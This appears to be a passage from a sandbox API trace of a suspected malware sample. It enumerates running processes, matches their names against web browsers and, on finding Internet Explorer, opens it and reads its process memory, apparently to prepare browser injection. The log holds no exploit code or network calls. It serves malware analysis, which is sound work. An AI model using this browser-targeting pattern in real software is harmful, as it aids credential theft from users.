	[0250.868] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xa09c
	[0250.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.868] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.868] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.868] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.869] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.869] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0250.870] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xa0a0
	[0250.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.870] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0250.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.870] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.870] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0250.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.871] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.871] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.872] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xa0a4
	[0250.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.872] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.872] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.873] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.873] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.873] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0250.874] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xa0a8
	[0250.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.874] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0250.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.874] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.875] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0250.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.875] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.875] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0250.876] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xa0ac
	[0250.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.876] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0250.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.876] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.877] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0250.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.877] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.877] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0250.878] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xa0b0
	[0250.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.878] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0250.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.878] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.879] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0250.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.879] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.879] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0250.880] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xa0b4
	[0250.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.880] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0250.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.881] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.881] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0250.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.881] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.881] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0250.882] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0250.882] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0250.883] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xa0b8
	[0250.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.883] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0250.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.884] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.884] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0250.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.885] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.885] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0250.886] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xa0bc
	[0250.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.886] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0250.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.887] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.887] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0250.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.887] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.887] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0250.888] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xa0c0
	[0250.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.888] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0250.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.889] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.889] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0250.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.889] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.890] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0250.890] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xa0c4
	[0250.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.890] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0250.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.891] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.891] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0250.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.891] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.892] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0250.892] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xa0c8
	[0250.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.893] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0250.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.893] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.894] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0250.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.894] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.895] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0250.896] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xa0cc
	[0250.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.896] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0250.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.896] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.896] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0250.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.897] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.897] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0250.898] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xa0d0
	[0250.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.898] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0250.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.899] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.899] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0250.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.900] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.900] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0250.901] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xa0d4
	[0250.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.901] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0250.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.902] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.902] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0250.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.902] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.903] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0250.903] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xa0d8
	[0250.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.904] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0250.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.904] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.905] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0250.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.905] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.905] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0250.906] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xa0dc
	[0250.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.906] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0250.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.906] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.907] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0250.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.907] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.907] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0250.908] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xa0e0
	[0250.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.908] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0250.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.908] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.909] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0250.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.909] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.910] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0250.910] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xa0e4
	[0250.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.911] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0250.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.911] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.912] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0250.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.913] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.913] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0250.914] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xa0e8
	[0250.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.914] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0250.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.914] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.915] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0250.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.915] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.916] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0250.916] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xa0ec
	[0250.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.917] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0250.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.917] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.918] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0250.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.919] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.919] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0250.920] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xa0f0
	[0250.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.920] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0250.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.920] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.921] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0250.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.921] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.922] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0250.923] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xa0f4
	[0250.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.923] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0250.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.923] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0250.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.923] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0250.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.924] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.924] NtQueryInformationProcess (in: ProcessHandle=0xa0f4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0250.924] ReadProcessMemory (in: hProcess=0xa0f4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0250.924] ReadProcessMemory (in: hProcess=0xa0f4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0250.924] ReadProcessMemory (in: hProcess=0xa0f4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0250.924] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0250.924] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0250.925] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xa0f8
	[0250.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
